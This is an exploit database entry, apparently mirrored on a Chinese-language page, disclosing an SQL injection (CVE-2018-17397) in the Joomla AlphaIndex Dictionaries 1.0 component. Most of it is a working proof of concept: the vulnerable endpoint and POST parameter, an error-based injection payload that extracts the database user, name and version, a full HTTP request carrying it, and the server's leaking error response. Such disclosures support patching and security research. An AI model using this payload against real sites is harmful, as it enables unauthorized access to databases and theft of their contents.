Joomla! Component AlphaIndex Dictionaries 1.0 – SQL Injection

  • 作者: Ihsan Sencan
    日期: 2018-09-25
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/45476/
  • # # # # #
# Exploit Title: Joomla! Component AlphaIndex Dictionaries 1.0 - SQL Injection
# Dork: N/A
# Date: 2018-09-24
# Vendor Homepage: http://multiplanet.gr/
# Software Link: https://extensions.joomla.org/extensions/extension/authoring-a-content/alphaindex-dictionaries/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-17397
# # # # #
# Exploit Author: Ihsan Sencan
# # # # #
# POC: 
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_aindexdictionaries&task=getArticlesPreview
# 
# Parameter: letter=[SQL] (POST)
#
# Payload: " AND (SELECT 66 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66 ,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VerAyari
# 
#POST /alphaindex-dictionaries/index.php?option=com_aindexdictionaries&task=getArticlesPreview HTTP/1.1
#Host: localhost
#User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0
#Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
#Accept-Language: en-US,en;q=0.5
#Accept-Encoding: gzip, deflate
#Cookie: 4d2a26b1a22184c44838ed58a1427b57=a5ebafd40988be7421846f2e1a496b61
#Connection: keep-alive
#Upgrade-Insecure-Requests: 1
#Content-Type: application/x-www-form-urlencoded
#Content-Length: 200
#
#letter=" AND (SELECT 66 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66 ,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VerAyari
#HTTP/1.1 500 Duplicate entry 'multipla_multi@localhost : multipla_dictionary : 10.2.17-MariaDB' for key 'group_key' SQL=SELECT .............
#Server: nginx admin
#Date: Mon, 17 Sep 2018 16:15:28 GMT
#Content-Type: text/html; charset=utf-8
#Transfer-Encoding: chunked
#Connection: keep-alive
#Cache-Control: no-cache
#Pragma: no-cache
#
# # # #